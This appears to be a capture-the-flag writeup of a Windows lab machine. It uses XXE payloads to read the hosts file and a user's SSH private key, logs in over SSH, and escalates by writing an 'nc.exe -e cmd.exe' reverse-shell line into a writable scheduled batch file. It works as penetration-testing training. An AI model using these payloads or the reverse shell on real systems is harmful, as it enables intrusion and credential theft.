- Top 1000 ports scan
nmap -sC -sV -oN nmap/initial
- the result
- All ports scan
nmap -sC -sV -p- -oN nmap/all_ports
- the result
Open Ports
- Well, both the Nmap scan result are the same
- port 22/SSH
- port 80/HTTP
- port 443/HTTPs
- Let’s take a look at the webpage
- Look’s like just a regular login page.
- We can try to login with
we’ve found from theprevious box
- Let’s try it
- Success
- Now, time to
enumerate/play around
with this page.
- Well, I found out. We can order something on the
order page
- Let’s try ordering something
- the result
- Every time a user orders something it’s always
pop up this message
. - Let’s try check
how this form handle the request
- I’m gonna
the request by usingburpsuite
- Then, send the request into
repeater tab
- I found this body kinda weird at first.
- It’s
doesn't look
like anyJSON
- Then, I realize this is
XML [Extensible Markup Language]
- Well, I heard something about
XML injection
before - Let’s try it
XXE [XML External Entity Injection]
An XML External Entity
attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
- Wikipedia - XML external entity attack
- Source
New Entity
- I’m going to test if a simple
new ENTITY declaration
is working - here’s what the payload gonna looks like.
- Source
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example "test"> ]>
- the result
- it is working
Read File
- Now, Let’s try to
read a file with it
- So, I’m gonna insert this command
<?xml version = "1.0"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "file:///c:/windows/system32/drivers/etc/hosts"> ]>
Bed for sleeping of course
- the result
- Wow! It works
Foothold/Gaining Access
- Remember this machine has
SSH open
. - Let’s try to read the
SSH private key
- Windows SSH key locate here:
- I’m gonna put this as a payload
<?xml version = "1.0"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "file:///c:/users/daniel/.ssh/id_rsa"> ]>
Bed for sleeping of course
- the result
- WOW! we’ve got the private key
- Let’s copy it and try login with SSH
Before we can log in. Make sure to change the permission of the key with the command
chmod 600 <filename>
- Now, Let’s try login with this command
ssh -i <filename> [email protected]
- I’m in
User Flag
- Let’s start to enumerate this machine
- I found kinda
folder in the root directory- maybe I don’t know it’s actually exists
- The folder called
- Found the file name
and see the content of that file
- So, I’m gonna assume this script for
clearing event log
and gonnarun automatically like UNIX cronjob
Checking File Permission
We can abuse this if we had the permission to change the content of the file
I’m going to run this command
icacls job.txt
- we’ve got
full access
to that file - remember we’re still
- Let’s get the shell
Privilege Escalation
- Let’s get the
reverse shell
. - First, we need to upload
into the machine
Windows do not come with nc installed. So, we need to upload it
- First, let’s start our
nc for listening to the connection
- Then, put this payload in
c:\log-management\nc.exe -e cmd.exe 9901
- the result
- we’ve got the
and own the box
Admin Flag
I’ve learned a lot today. The XXE is so cool and it also can be dangerous if the input is not properly configured. Talk about “configure”. The file admin can run also need to configure properly in this case file called job.bat. Once again, don’t use the same password.
I have a fun time doing this machine and I hope you guys do too. Bye ;)